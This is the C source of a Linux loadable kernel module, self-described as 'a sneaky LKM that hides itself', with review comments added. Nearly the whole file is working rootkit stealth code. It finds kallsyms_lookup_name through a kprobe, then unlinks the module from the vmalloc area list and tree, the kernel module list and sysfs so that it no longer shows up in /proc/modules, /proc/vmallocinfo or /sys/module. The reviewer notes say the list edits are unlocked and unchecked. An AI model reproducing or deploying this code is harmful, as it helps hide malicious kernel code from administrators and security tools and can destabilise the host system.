main.c
#include <linux/kallsyms.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
/*
 * On kernels >= 5.7 this file does not call an exported
 * kallsyms_lookup_name(); it defines KPROBE_LOOKUP and declares a kprobe on
 * that symbol instead. hide_myself() registers the probe only to read back
 * the resolved address from kp.addr.
 * NOTE(review): presumably this is because kallsyms_lookup_name() stopped
 * being exported to modules in 5.7 -- confirm against the target kernel.
 */
#if LINUX_VERSION_CODE >= KERNEL_VERSION(5, 7, 0)
#define KPROBE_LOOKUP 1
#include <linux/kprobes.h>
static struct kprobe kp = {
.symbol_name = "kallsyms_lookup_name",
};
#endif
/* Module metadata; the description string states the module's purpose. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Het Joshi");
MODULE_DESCRIPTION("A sneaky LKM that hides it self");
/*
 * hide_myself() - unlink this module from the kernel's own bookkeeping.
 *
 * Looks up vmap_area_list and vmap_area_root by name, then removes this
 * module's records from, in order: the vmalloc area list and its red-black
 * tree, the module list, the module's sysfs kobject, and every module_use
 * record on THIS_MODULE->target_list.
 *
 * Returns nothing. If register_kprobe() fails the function returns early
 * and the caller cannot tell that nothing was unlinked.
 *
 * NOTE(review): no lock is taken around any of the list or tree edits below,
 * and the two looked-up addresses are dereferenced without a check for 0.
 * Both make the module a stability risk for the host -- confirm whether the
 * symbols exist on the kernel in use.
 *
 * NOTE(review): only the records listed above are touched; the module's
 * memory is neither freed nor modified here. Checks that do not read these
 * lists, and controls that act when the module is loaded (before this init
 * code runs), are presumably unaffected -- confirm per environment.
 */
static void __init hide_myself(void)
{
struct vmap_area *va, *vtmp;
struct module_use *use, *tmp;
struct list_head *_vmap_area_list;
struct rb_root *_vmap_area_root;
#ifdef KPROBE_LOOKUP
/*
 * Local function pointer with the same name as the kernel symbol, so the
 * lookups below read the same on both sides of the version check. The
 * kprobe is registered only to have kp.addr filled in, then removed again.
 */
unsigned long (*kallsyms_lookup_name)(const char *name);
if (register_kprobe(&kp) < 0)
return;
kallsyms_lookup_name = (unsigned long (*)(const char *name)) kp.addr;
unregister_kprobe(&kp);
#endif
/* Resolve the two vmalloc bookkeeping structures by symbol name. */
_vmap_area_list =
(struct list_head *) kallsyms_lookup_name("vmap_area_list");
_vmap_area_root = (struct rb_root *) kallsyms_lookup_name("vmap_area_root");
/*
 * Drop every vmap_area whose [va_start, va_end] range strictly contains
 * the address of THIS_MODULE; the author's intent is that the area no
 * longer appears in /proc/vmallocinfo.
 */
list_for_each_entry_safe (va, vtmp, _vmap_area_list, list) {
if ((unsigned long) THIS_MODULE > va->va_start &&
(unsigned long) THIS_MODULE < va->va_end) {
list_del(&va->list);
/* remove the same area from the red-black tree */
rb_erase(&va->rb_node, _vmap_area_root);
}
}
/* unlink from the module list, so it is no longer listed in /proc/modules */
list_del_init(&THIS_MODULE->list);
/* delete the module's kobject, so its /sys/module entry goes away */
kobject_del(&THIS_MODULE->mkobj.kobj);
/*
 * For each module_use record on this module's target_list: unlink it from
 * both lists, remove the sysfs link named after this module from
 * use->target's holders directory, and free the record.
 */
list_for_each_entry_safe (use, tmp, &THIS_MODULE->target_list,
target_list) {
list_del(&use->source_list);
list_del(&use->target_list);
sysfs_remove_link(use->target->holders_dir, THIS_MODULE->name);
kfree(use);
}
}
/*
 * hide_init() - module entry point.
 *
 * Runs hide_myself() and then writes two messages with printk(), neither
 * with an explicit log level. Always returns 0; hide_myself() is void, so
 * the first message is printed even when it returned early without
 * unlinking anything.
 *
 * NOTE(review): both printk() calls leave entries in the kernel log,
 * contradicting the "untraceable" wording. The second one prints the
 * address of THIS_MODULE via %p.
 */
static int __init hide_init(void)
{
hide_myself();
printk("The hidden module is now loaded and untraceable!\n");
printk("This: %p \n", THIS_MODULE); /* TODO: remove this line */
return 0;
}
/*
 * hide_exit() - module exit handler; only logs a message (no log level, no
 * trailing newline). It does not re-add anything hide_myself() unlinked.
 * NOTE(review): presumably not reachable through the normal unload path once
 * the module has been removed from the module list -- confirm.
 */
static void __exit hide_exit(void) {
printk("Dhanywad!");
}
/* Register the entry and exit handlers with the module loader. */
module_init(hide_init);
module_exit(hide_exit);